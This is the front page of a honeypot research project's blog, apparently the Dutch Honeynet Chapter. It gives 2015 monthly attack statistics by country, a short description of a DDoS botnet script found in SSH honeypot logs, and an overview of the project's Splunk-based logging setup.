Welcome

Welcome to the Dutch Honeynet Chapter. This project has many components and the goal is mass collection of data.

We will be monitoring many different services in both client honeypots and server honeypots as well as SCADA.

We will also be focusing on a select group of websites and monitoring for malicious changes. Another component of our work will perform automated malware analysis by custom modifications to the Cookoo malware engine.

We are looking for others to share data with.

 

Monthly stats: October 2015

Stats

  • Total attacks: 5149873
  • Total unique Attackers: 149031
  • Total unique MD5s: 662
  • Total unique urls: 2985

Countries

COUNTRY ATTACKS PERCENTAGE
Bulgaria 669010 13.391580
Venezuela 588031 11.770623
China 508521 10.179070
Russia 476921 9.546533
Brazil 377183 7.550076
United States 279216 5.589070
Japan 233278 4.669528
Egypt 188663 3.776469
Hong Kong 182791 3.658929
Ukraine 145716 2.916799

Continue reading Monthly stats: October 2015

Monthly stats: August 2015

Stats

  • Total attacks: 3303872
  • Total unique Attackers: 147233
  • Total unique MD5s: 457
  • Total unique urls: 1749

Countries

Country Attacks Percentage
China 473535 15.245589
United States 344286 11.084382
Egypt 304413 9.800660
Venezuela 303171 9.760673
Japan 278638 8.970827
Vietnam 139704 4.497808
Russia 134387 4.326626
Turkey 123942 3.990347
Brazil 120939 3.893664
Hong Kong 85259 2.744937

Continue reading Monthly stats: August 2015

Monthly stats: July 2015

July has been an exciting month for us. We have been steadily expanding our worldwide honeypot sensor coverage to a total of 57 sensors in the following countries: NL, US, UK, DE, RO, JP, UA, SA, AU, SG, HK, BR

But the majority of our effort has been building out our extensive analytic capabilities for data mining threat intelligence world wide.

We have chosen splunk to assist us in this endeavor and we would like to share with you some of our metrics.

Continue reading Monthly stats: July 2015

DDos botnet defaced

While collecting stats from last month we did a nice discovery in the ssh logs from  kippo.

kippo_file_found

( we talk about gb.sh )

It first came up at our splunk dashboard, and while checking the link it was still online.  Curious to find out more about the file we started to dig into it.

We learned that the shell script is actually downloading another 6 files that are pre compiled and will be given executable rights, as last they will be started.

Continue reading DDos botnet defaced

Honeypot Infrastructure

One of the goals of the Dutch Honeypots Project is to collect data. Since our inception,  we have been working to design our data collection infrastructure. As a start we have chosen to run some basic honeypot services (Kippo, Dionaea and p0f). We start with basic services such that we can make our logging backend perfect.
In order to collect logs centrally, we chose to use Splunk since it has many advanced features and allows us to integrate (possibly) live data on this website. Furthermore any types of logs (e.g. to text files, log files, databases etc.) can be imported to Splunk by running the Splunk Universal Forwarder application on the honeypot. This forwarder will send data over to the Splunk Indexer which parses the logs. We also store the logs on the Indexer and keep an archive.

The following diagram shows a global overview of our current infrastructure (click the image for a larger version):

Infrastructure Overview

This is the current infrastructure which is now in place. Splunk still needs to be configured for the most part such that we are able to generate some useful overviews and crunch through all the data.

Our next step is to expand the number of honeypot services. These services will be in line with the goals set on the Project page. Once we have more services we will also expand the number of honeypots  to be able to collect more data.